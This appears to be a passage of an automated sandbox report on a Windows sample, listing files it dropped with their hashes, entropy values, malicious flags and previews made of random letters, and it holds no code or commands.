                                                                                                                                                                                                                                                                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                                                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                                                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                                                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                                                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                                                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                                                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                                                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                                                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.700014595314478
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                                                                                                                                                                                                                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                                                                                                                                                                                                                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                                                                                                                                                                                                                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                                                                                                                                                                                                                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6994061563025005
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                                                                                                                                                                                                                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                                                                                                                                                                                                                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                                                                                                                                                                                                                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                                                                                                                                                                                                                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                                                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                                                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                                                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                                                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                                                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                                                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                                                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                                                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                  Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\bc7EKCf.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                                                                                                  MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                                                                                                  SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                                                                                                  SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                                                                                                  SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                                                                                                  Malicious:false
